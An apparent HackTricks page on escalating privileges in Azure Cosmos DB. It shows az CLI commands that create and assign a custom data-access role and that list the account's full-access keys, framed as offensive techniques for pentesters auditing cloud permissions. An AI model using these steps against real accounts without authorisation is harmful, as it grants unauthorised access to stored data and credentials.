Az - CosmosDB Privesc

Reading time: 3 minutes

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

CosmosDB Privesc

For more information about SQL Database check:

{% content-ref url="../az-services/az-cosmosDB.md" %} az-cosmosDB.md {% endcontent-ref %}

("Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read") & ("Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read")

With this permissions you can priviledge scalate giving a user the pemrissions to execute queries and connect to the database. First a definition role is created giving the necesary permissions and scopes.

{% code overflow="wrap" %}

bash
az cosmosdb sql role definition create \
    --account-name <account_name> \
    --resource-group <resource_group_name> \
    --body '{
      "Id": "<Random-Unique-ID>", # For example 12345678-1234-1234-1234-123456789az
      "RoleName": "CustomReadRole",
      "Type": "CustomRole",
      "AssignableScopes": [
        "/subscriptions/<subscription_id>/resourceGroups/sqldatabase/providers/Microsoft.DocumentDB/databaseAccounts/<account_name>"
      ],
      "Permissions": [
        {
          "DataActions": [
            "Microsoft.DocumentDB/databaseAccounts/readMetadata",
            "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
            "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*"
          ]
        }
      ]
    }'

{% endcode %}

After that the assigment of the definition is given to a user. After this that user can use the DefaultAzureCredential() connection method to execute queries.

{% code overflow="wrap" %}

bash
az cosmosdb sql role assignment create \
    --account-name <account_name> \
    --resource-group <resource_group_name> \
    --role-definition-id <Random-Unique-ID-used-in-definition> \
    --principal-id <principal_id-togive-perms> \
    --scope "/"

{% endcode %}

"Microsoft.DocumentDB/databaseAccounts/listKeys/action"

With this permission, you can retrieve the primary and secondary keys for an Azure Cosmos DB account. These keys provide full access to the database account and its resources, enabling actions such as data reads, writes, and configuration changes.

{% code overflow="wrap" %}

bash
az cosmosdb keys list \
  --name <account_name> \
  --resource-group <resource_group_name>

{% endcode %}

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}